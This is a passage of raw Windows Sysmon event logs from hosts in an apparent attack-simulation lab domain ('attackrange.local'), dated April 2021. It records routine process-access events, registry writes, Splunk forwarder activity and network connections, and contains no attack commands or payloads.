Office\root\integration\integrator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\fwbase.dll+1594|c:\windows\system32\fwbase.dll+13f6|c:\windows\system32\mpssvc.dll+dbc2|c:\windows\system32\mpssvc.dll+3014e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072199Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.032{A7A01FEF-B626-607E-1500-00000000BB01}14965028C:\Windows\system32\svchost.exe{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\fwbase.dll+1594|c:\windows\system32\fwbase.dll+13f6|c:\windows\system32\mpssvc.dll+2fc35|c:\windows\system32\mpssvc.dll+2fb4e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000072198Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:57.032{A7A01FEF-B626-607E-1500-00000000BB01}1496C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x00000641) 13241300x800000000000000072197Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:57.032{A7A01FEF-B626-607E-1500-00000000BB01}1496C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{3D36583A-4BFA-4254-B748-97E29797485F}v2.26|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Domain|LPort=6004|App=C:\Program Files\Microsoft Office\root\Office16\outlook.exe|Name=Microsoft Office Outlook| 10341000x800000000000000072196Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.032{A7A01FEF-B626-607E-1500-00000000BB01}14965028C:\Windows\system32\svchost.exe{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\fwbase.dll+1594|c:\windows\system32\fwbase.dll+13f6|c:\windows\system32\mpssvc.dll+dbc2|c:\windows\system32\mpssvc.dll+3014e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072195Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.032{A7A01FEF-B626-607E-1500-00000000BB01}14965028C:\Windows\system32\svchost.exe{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\fwbase.dll+1594|c:\windows\system32\fwbase.dll+13f6|c:\windows\system32\mpssvc.dll+2fc35|c:\windows\system32\mpssvc.dll+2fb4e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072194Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.001{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2500-00000000BB01}3032C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000072193Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2021-04-20 14:55:57.001{A7A01FEF-B636-607E-2500-00000000BB01}3032C:\Windows\System32\spoolsv.exeHKLM\System\CurrentControlSet\Control\DeviceClasses\{0ecef634-6ef0-472a-8085-5ad023ecbccd}\##?#SWD#PRINTENUM#{AECFC3B9-87BA-4CDB-901B-B9612E36E8DF}#{0ecef634-6ef0-472a-8085-5ad023ecbccd}\#\Device Parameters\FriendlyNameOneNote (Desktop) 13241300x800000000000000072192Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2021-04-20 14:55:57.001{A7A01FEF-B622-607E-0100-00000000BB01}4SystemHKLM\System\CurrentControlSet\Enum\SWD\PRINTENUM\{AECFC3B9-87BA-4CDB-901B-B9612E36E8DF}\FriendlyNameOneNote (Desktop) 13241300x800000000000000072191Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-DriverVerSetValue2021-04-20 14:55:57.001{A7A01FEF-B622-607E-0100-00000000BB01}4SystemHKLM\System\CurrentControlSet\Control\Class\{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}\0003\DriverVersion10.0.14393.0 10341000x800000000000000049913Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:57.949{85C0FFC9-EB7D-607E-DF06-00000000BB01}39561136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049912Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:57.840{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EB7D-607E-DF06-00000000BB01}3956C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049911Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:57.840{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049910Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:57.840{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049909Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:57.840{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049908Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:57.840{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049907Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:57.840{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049906Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:57.840{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049905Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:57.840{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049904Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:57.840{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049903Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:57.840{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049902Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:57.840{85C0FFC9-B7EC-607E-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{85C0FFC9-EB7D-607E-DF06-00000000BB01}3956C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000049901Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:57.840{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EB7D-607E-DF06-00000000BB01}3956C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000049900Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:57.841{85C0FFC9-EB7D-607E-DF06-00000000BB01}3956C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000049899Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:55.792{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52505-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000049898Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:55.787{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-57116-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049897Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:57.449{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB29AB32112AA68F0DDAF75A6BA90E30,SHA256=B2D0E71D0AA85EFEDC744395304A08AC2CCB21F135D56C120B66E655335463CA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000049896Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:57.277{85C0FFC9-EB7D-607E-DE06-00000000BB01}10121228C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049895Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:57.168{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EB7D-607E-DE06-00000000BB01}1012C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049894Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:57.168{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049893Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:57.168{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049892Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 